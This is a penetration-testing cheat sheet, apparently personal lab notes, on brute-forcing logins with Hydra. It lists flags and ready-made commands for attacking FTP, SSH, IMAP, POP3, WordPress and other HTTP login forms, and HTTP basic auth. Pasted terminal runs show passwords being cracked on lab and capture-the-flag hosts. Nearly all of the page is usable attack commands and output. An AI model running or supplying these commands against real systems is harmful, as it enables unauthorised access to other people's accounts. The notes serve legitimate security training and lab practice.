🐙HYDRA

-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-I : ignore hydra.restore file
-V : very verbose output
-f : stop when a logon is found
-L : username list
-u : rotate around usernames, not passwords
-P : passwords list

example

hydra -I -V -f -L usernames.txt -u -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt 192.168.179.46 ftp

HTTP Modules

hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e

http[s]-{head|get|post}
http[s]-post-form

hydra http-post-form -U
hydra -L <usernames list> -P <passwords list> -f -u <target ip> -s <port> http-get /
hydra -l <username> -P <password list> -f <target ip> -s <target port> http-post-form "/<login page>:<user parameter>=^USER^&<password parameter>=^PASS^:[F/S]=<failed/success string>"

code

hydra -l admin -P rockyou-50.txt http://10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^::Incorrect username"

example

Service Authentication Brute Forcing

SSH Attack

code

hydra -L <usernames list> -P <password list> -u -f ssh://<target ip> -t 4

code

hydra -t 1 -L users.txt -P passwords.txt -vV <target ip > ssh

<service>://<target ip>:<port>
hydra -L <usernames list> -P <password list> -u -f ssh://<target ip> -t 4

Examples

hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh

Hydra Flags:

-l: Login with LOGIN name
-L: Load several logins from FILE
-p: Try password PASS
-P: Load several passwords from FILE
-C: FILE colon separated "login:pass" format, instead of -L/-P options
-u: loop around users, not passwords (effective! implied with -x)
-s: PORT if the service is on a different default port, define it here
-f: exit when a login/pass pair is found
-t: TASKS run TASKS number of connects in parallel per target (default: 16)
-4 / -6: Use IPv4 (default) / IPv6 addresses (put always in [] also in -M)

FTP Attack

Reference:

b374k shell

code

hydra -l admin -P /usr/share/wordlists/rockyou.txt -e nsr -f ftp://192.168.68.46

example

ali@kali:~$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -e nsr -f ftp://192.168.68.46
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-27 17:43:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344402 login tries (l:1/p:14344402), ~896526 tries per task
[DATA] attacking ftp://192.168.68.46:21/
[21][ftp] host: 192.168.68.46   login: admin   password: admin
[STATUS] attack finished for 192.168.68.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-27 17:43:44
kali@kali:~$

HTTP ATTACK

code

hydra -l jim -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt 192.168.135.52 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.135.52%2Fwp-admin%2F&testcookie=1:The password you entered for the username" -vV -f

example

┌──(eo㉿offsec)-[~]
└─$ hydra -l jim -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt 192.168.135.52 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.135.52%2Fwp-admin%2F&testcookie=1:The password you entered for the username" -vV -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-09 07:36:59
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://192.168.135.52:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.135.52%2Fwp-admin%2F&testcookie=1:The password you entered for the username
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done

[ATTEMPT] target 192.168.135.52 - login "jim" - pass "4321" - 751 of 10000 [child 2] (0/0)
[80][http-post-form] host: 192.168.135.52   login: jim   password: kimberly
[STATUS] attack finished for 192.168.135.52 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-09 07:37:52

example

hydra -l admin -P /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt 192.168.185.46 ftp -f -V

Basic Auth

code

hydra -l offsec -P /usr/share/wordlists/rockyou.txt -s 242 -f 192.168.185.46 http-get /index.php

example

┌──(19:31:43 eo㉿offsec)-[~]
└─$ hydra -l offsec -P /usr/share/wordlists/rockyou.txt -s 242 -f 192.168.185.46 http-get /index.php
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-07 19:31:58
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.185.46:242/index.php
[STATUS] 1481.00 tries/min, 1481 tries in 00:01h, 14342918 to do in 161:25h, 16 active
[STATUS] 1629.67 tries/min, 4889 tries in 00:03h, 14339510 to do in 146:40h, 16 active
[STATUS] 1674.14 tries/min, 11719 tries in 00:07h, 14332680 to do in 142:42h, 16 active
[242][http-get] host: 192.168.185.46   login: offsec   password: elite
[STATUS] attack finished for 192.168.185.46 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-07 19:46:53

IppSec's Example

reference

https://youtu.be/qKcUKlwoGw8?t=2436

code

hydra -C userpass.txt streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"

example

PreviousBrute Forcing NextSed

Last updated 3 years ago

hashtagHTTP Modules

hashtagService Authentication Brute Forcing

hashtagSSH Attack

hashtagFTP Attack

hashtagHTTP ATTACK

hashtagBasic Auth

hashtagIppSec's Example

HTTP Modules

Service Authentication Brute Forcing

SSH Attack

FTP Attack

HTTP ATTACK

Basic Auth

IppSec's Example